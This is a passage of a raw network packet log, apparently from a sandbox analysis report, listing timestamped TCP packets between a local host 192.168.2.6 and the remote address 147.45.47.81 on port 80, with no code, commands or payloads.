                                                              Oct 30, 2024 15:44:46.167712927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167731047 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167762041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167794943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167845964 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167845964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167880058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167912960 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167918921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167948961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.167952061 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.167982101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168015003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168018103 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168047905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168081045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168114901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168138981 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168148041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168154955 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168179989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168214083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168246031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168253899 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168283939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168297052 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168317080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168350935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168382883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168387890 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168416023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168423891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168447971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168483019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168500900 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168515921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168550014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168560028 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.168586969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168621063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.168627977 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172035933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172070026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172091007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172122955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172156096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172164917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172188997 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172234058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172238111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172271967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172303915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172312021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172354937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172405958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172410011 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172440052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172468901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172482014 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172530890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172566891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172574043 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172600031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172632933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172646046 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172667027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172703028 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172707081 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172732115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172765017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172779083 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.172797918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.172835112 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.185348988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185468912 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185518026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185527086 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.185553074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185585022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185591936 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.185617924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185650110 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185653925 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.185682058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.185735941 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.196548939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.200913906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.200951099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.200985909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.201000929 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.201735973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.201786041 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.201792955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.201822996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.201862097 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.201874971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.201908112 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.201941967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.201946974 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.201975107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.202008009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.202012062 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.206839085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.206888914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.206895113 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.206923008 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.206971884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.206985950 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207022905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207053900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207068920 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207087040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207129002 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207138062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207186937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207221031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207228899 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207271099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207303047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207331896 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207362890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207391977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207422018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207442999 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207484961 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207494974 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207523108 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207556009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207562923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207590103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207622051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207631111 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207659006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207699060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207892895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207921982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207954884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.207957983 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.207988024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208020926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208029032 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208070040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208108902 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208121061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208173037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208201885 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208224058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208254099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208297014 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208307028 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208354950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208389044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208395958 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208416939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208453894 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208498955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208533049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208565950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208596945 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208597898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208630085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208659887 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208731890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208760977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208772898 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208794117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208827972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208832979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.208859921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208894968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.208899021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.211986065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.212033987 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.212034941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.212069035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.212104082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.212124109 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.212138891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.212181091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.217732906 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.223547935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.223602057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.223637104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.223649979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.223669052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.223702908 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.223707914 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.223736048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.223776102 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.227994919 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.229475021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.265801907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.265862942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.265893936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.265923977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.265958071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.265973091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.265994072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266011953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266028881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266031981 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266083956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266128063 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266138077 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266171932 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266207933 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266222954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266257048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266289949 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266298056 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266324043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266356945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266376972 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266392946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266426086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266433954 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266462088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266495943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266501904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266530991 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266561031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266572952 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266628981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266664982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266669989 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266695976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266731024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266736984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266783953 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266828060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266835928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266885042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266918898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266927958 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.266952038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266987085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.266993046 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267019033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267057896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267069101 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267090082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267127037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267148018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267160892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267194986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267203093 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267230988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267265081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267276049 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267332077 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267374039 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267389059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267421961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267456055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267467022 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267488956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267523050 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267550945 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267556906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267590046 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267600060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267630100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267674923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267680883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267715931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267765045 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267766953 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267816067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267849922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267859936 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267883062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267916918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267925978 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.267951012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267988920 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.267993927 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268023014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268055916 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268075943 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268091917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268136024 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268361092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268414021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268449068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268455029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268481970 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268516064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268520117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268549919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268584013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268589973 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268615961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268650055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268660069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268682003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268717051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268723011 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268749952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268785954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268794060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268821001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268856049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268872023 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268891096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268930912 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.268939972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.268991947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269025087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269048929 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269074917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269115925 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269125938 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269160986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269193888 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269202948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269244909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269278049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269284964 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269311905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269347906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269352913 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269382000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269412994 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269417048 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269445896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269480944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269486904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269515038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269550085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269557953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269583941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269618988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269638062 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269895077 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269943953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.269946098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.269979954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270011902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.270016909 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.270045996 CET8049995147.45.47.81192.168.2.6
